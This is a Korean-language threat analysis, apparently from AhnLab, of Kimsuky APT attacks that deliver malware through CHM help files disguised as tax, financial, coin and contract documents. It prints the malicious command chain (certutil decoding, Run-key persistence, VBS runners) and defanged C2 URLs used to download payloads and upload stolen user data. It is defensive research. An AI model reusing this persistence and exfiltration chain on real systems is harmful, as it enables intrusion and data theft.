안랩 분석팀은 김수키(Kimsuky) 해킹 그룹의 APT 공격을 꾸준히 추적해왔다. 김수키는 그동안 악성코드를 유포하는 데 주로 대북 관련 내용의 문서 파일을 사용했지만, 최근에는 다양한 주제로 작성된 도움말 파일(*.chm)을 이용하는 정황이 다수 확인되고 있다. 이번 글에서는 올해 5월 한 달 동안 안랩이 확인한 김수키의 공격 사례를 소개한다.

​

확인된 악성코드 유포 파일명은 [표 1]과 같다. 코인, 세무, 계약서 등 다양한 양식으로 위장해 유포 중인 것을 확인할 수 있으며, 공격자는 특정 사용자의 개인정보를 이용한 것으로 추정된다.

​ 

[그림 1] 세무 조사 신고 안내문으로 위장한 사례

[그림 2]는 특정 사용자 간의 금융 거래 정보로 위장한 형태이다. 공격자가 탈취한 개인정보를 이용한 것으로 추정되며, 해당 도움말 파일에서 실제 사용자의 계좌번호와 거래 내역을 확인할 수 있다.

​

[그림 2] 금융 거래 정보로 위장한 사례

​

[그림 3] 은 코인 거래 확인서로 위장한 사례이다. [그림 2]의 사례와 동일하게 실제 사용자의 이메일 주소와 전화번호 등의 개인정보가 표시된다.

​

[그림 3] 코인 거래 확인서로 위장한 사례

​

[그림 4] 와 같이 계약서, 증명서, 발주서 등을 사칭하는 경우도 있다. 이 외에도 특정 사용자의 주민등록등본, 표 예매 내역 등 다양한 형태로 유포되고 있어 각별한 주의가 필요하다.

​

​[그림 4] 계약서 등의 서류로 위장한 사례

​

김수키가 유포한 chm 악성코드의 전체적인 동작 과정을 살펴보면 [그림 5]와 같다. 다운로드되는 다수의 스크립트를 통해 사용자 정보를 탈취하고 추가 악성코드를 다운로드한다.

​

[그림 6] chm 파일 내부에 존재하는 악성 스크립트

​

Ÿ   실행 명령어

• cmd, /c start /MIN REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v oeirituttvv /t REG_SZ /d 
• “%USERPROFILE%\Links\oeirituttvv.vbs” /f & echo [인코딩된 명령어] >
• “%USERPROFILE%\Links\oeirituttbb.dat” & echo [인코딩된 명령어] >
• “%USERPROFILE%\Links\oeirituttvv.dat” & start /MIN certutil -decode “%USERPROFILE%\Links\oeirituttvv.dat” “%USERPROFILE%\Links\oeirituttvv.vbs” & start /MIN certutil -decode “%USERPROFILE%\Links\oeirituttbb.dat”
• “%USERPROFILE%\Links\oeirituttbb.bat” & start /MIN timeout -t 1 /nobreak & start /MIN CScript “%USERPROFILE%\Links\oeirituttvv.vbs” & start /MIN timeout -t 2 /nobreak & start /MIN CScript “%USERPROFILE%\Links\oeirituttvv.vbs

해당 명령어의 기능은 인코딩된 명령어 2개를 각각 “%USERPROFILE%\Links\oeirituttbb.dat” 및 “%USERPROFILE%\Links\oeirituttvv.dat”에 저장하며, certutil를 통해 디코딩된 명령어를 oeirituttbb.vbs와 oeirituttvv.bat 파일에 저장한다. 이후 oeirituttbb.vbs를 실행하고 oeirituttbb.vbs 파일을 RUN 키에 등록해 지속적으로 실행되도록 한다.

​

[그림 7] oeirituttbb.vbs 및 oeirituttvv.bat

​

oeirituttbb.vbs 는 함께 생성된 oeirituttvv.bat 파일을 실행하는 Runner이다. oeirituttvv.bat 은 curl을 통해 추가 악성 파일을 다운로드하는 기능을 수행하며, 다운로드되는 파일은 BAT 파일과 CAB 파일로 총 2개이다.

•           hxxp://vndjgheruewy1[.]com/tnd/pung03.txt
•           hxxp://vndjgheruewy1[.]com/tnd/qung03.txt​ 

[그림 8] pung03.bat 및 qung03.cab​

• ​다운로드된 BAT 파일(pung03.bat)은 CAB 파일(qung03.cab)을 압축 해제한 후 temprr03.bat 을 실행한다. CAB 파일 내부에는 총 6개의 스크립트가 존재하며, 각 스크립트의 기능은 [표 2] 와 같다.
•  

•  

  파일명	기능
  temprr03.bat	loyes03.bat 실행
  loyes03.bat	RunKey 등록 (mnasrt.vbs) loyestemp03.bat 실행 dwpp.vbs 실행
  mnasrt.vbs	loyes03.bat 실행
  loyestemp03.bat	사용자 정보 수집 uwpp.vbs 실행
  dwpp.vbs	CAB 다운로드
  uwpp.vbs	사용자 정보 업로드

   [표 2] 스크립트 기능

   

• 해당 스크립트에 의해 수행되는 최종 악성 행위는 사용자 정보 탈취 및 추가 악성 파일 다운로드이다.

   

  사용자 정보 탈취 코드는 [그림 9] 와 같으며, 탈취되는 정보는 [표 3] 과 같다. loyestemp03.bat 을 통해 사용자 정보를 수집하며, uwpp.vbs 를 통해 수집된 사용자 정보를 컴퓨터명과 함께 “hxxp://vndjgheruewy1[.]com/uun06/uwpp.php” 로 전송한다.

[그림 9] 사용자 정보 탈취

​ 

 [표 3] 탈취 정보

[그림 10] 다운로드 기능